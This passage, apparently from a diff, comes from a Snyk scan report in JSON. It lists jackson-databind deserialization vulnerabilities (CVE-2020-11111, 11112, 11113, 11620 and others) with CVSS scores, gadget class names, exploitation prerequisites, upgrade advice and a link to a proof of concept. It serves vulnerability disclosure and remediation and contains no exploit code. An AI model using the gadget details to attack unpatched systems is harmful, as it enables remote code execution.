"2024-03-11T09:53:47.400473Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:21.749219Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:18.889961Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:47.400473Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11113" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-9vvp-fxw6-jcxr" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T08:36:41.369827Z", - "functions_new": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:36Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:36Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:47.400473Z", - "socialTrendAlert": false, - "packagePopularityRank": 
99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2664", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.628835Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.297635Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.145935Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11111" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-v3xw-c963-f5hc" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:28:18.821103Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.145935Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676", - "title": "GItHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2666", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.8, - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:03.656527Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:44:29.301384Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.113524Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n", - "epssDetails": { - "percentile": "0.81603", - "probability": "0.00786", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11112" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-58pp-9c76-5625" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-03-31T09:29:29.728517Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-03-31T06:16:37Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-03-31T06:16:37Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.113524Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2682", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:57.162608Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:54.679784Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.073265Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.92404", - "probability": "0.04399", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-11620" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-h4rc-386g-6m85" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-04-08T10:55:38.169333Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-04-08T00:42:23Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-04-08T00:42:23Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:17.073265Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Tatu Saloranta" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.4)", - "[2.7.0,2.9.10.4)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.6.7.4", - "2.9.10.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0,2.9.10.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2680", - "title": "GitHub Issues" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.933985Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:17.355553Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:54.585105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
